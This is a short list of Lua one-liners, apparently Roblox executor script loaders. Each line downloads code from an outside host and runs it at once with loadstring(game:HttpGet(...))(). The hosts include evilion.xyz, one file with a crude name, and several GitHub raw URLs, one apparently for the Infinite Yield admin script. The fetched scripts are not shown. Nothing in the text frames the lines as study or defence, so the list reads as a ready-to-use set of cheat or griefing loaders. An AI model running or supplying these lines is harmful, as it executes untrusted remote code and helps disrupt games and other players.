loadstring(game:HttpGet("https://evilion.xyz/akfiles/facefuck.lua"))()
loadstring(game:HttpGet("https://evilion.xyz/akfiles/Gclone.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Gi7331/scripts/main/Emote.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/H20CalibreYT/SystemBroken/main/script"))()
loadstring(game:HttpGet("https://evilion.xyz/akfiles/Baseplate.lua"))()
